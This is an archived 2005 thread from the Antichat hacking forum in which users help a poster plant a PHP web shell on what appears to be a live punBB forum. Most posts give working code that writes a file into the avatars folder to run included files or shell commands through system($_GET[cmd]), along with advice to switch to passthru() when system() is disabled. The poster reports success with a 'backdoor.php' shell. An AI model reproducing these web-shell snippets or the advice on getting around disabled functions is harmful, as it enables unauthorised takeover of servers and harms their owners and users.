Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   About punbb video... :) (https://forum.antichat.xyz/showthread.php?t=9940)

néM3S!s 09.10.2005 19:15

About punbb video... :)
 
io !!! :D

http://video.antichat.net/videos/ShAnKaR/xak.rar

I have an error with the picture.. :rolleyes:

Parse error: parse error, unexpected ')' in /space_3/mrtom/forum/img/avatars/q.php on line 1

My picture :

<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>

Please, somebody to give me an original picture ? :)

Thank'S

KEZ 09.10.2005 23:08

Цитата:

<?
$fd=fopen('img/avatars/q.php','w+');
fwrite($fd,"<? include($fuck); ?>")
fclose($fd);
?>
Right code:

<?
$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? include($fuck); ?>" );
fclose( $f );
?>


or


$f = fopen( "img/avatars/q.php", "w");
fwrite( $f, "<? system($fuck); ?>" );
fclose( $f );
?>

- then $fuck parameter specify SHELL COMMAND, not file to include

grinay 10.10.2005 02:48

<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/q.php","a+");
fwrite($fopen,$shell);
?>

Make so if you have access in that directory then all will work..

KEZ 10.10.2005 03:01

and fclose($fopen);
or fflush($fopen);

grinay 10.10.2005 05:16

It is possible to not close all and so will work %)

néM3S!s 10.10.2005 11:38

Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1

with :

<?php
$shell="<?php system(\$_GET[cmd]);?>";
$fopen=fopen("img/avatars/c.php","a+");
fwrite($fopen,$shell);
?>

:rolleyes:

not other means?

KEZ 10.10.2005 13:02

Цитата:

Warning: system() has been disabled for security reasons in /space_3/mrtom/forum/img/avatars/c.php on line 1
system() function created for execute commands, system( "ls -ailrt" ); for example.
this function was disabled for security reasons by admin. try to change system() to passthru().
if there has not works, use only file includin'... you can see it on ShAnKaR's video...

че сказал сам нипонил

néM3S!s 10.10.2005 15:57

no good..

BUT !! !! !!!!

I put the code of "backdoor.php" (shellZ) in the picture and it's Good ! :D

Thx KeZ and others http://forum.antichat.ru/images/icons/icon14.gif


Время: 09:30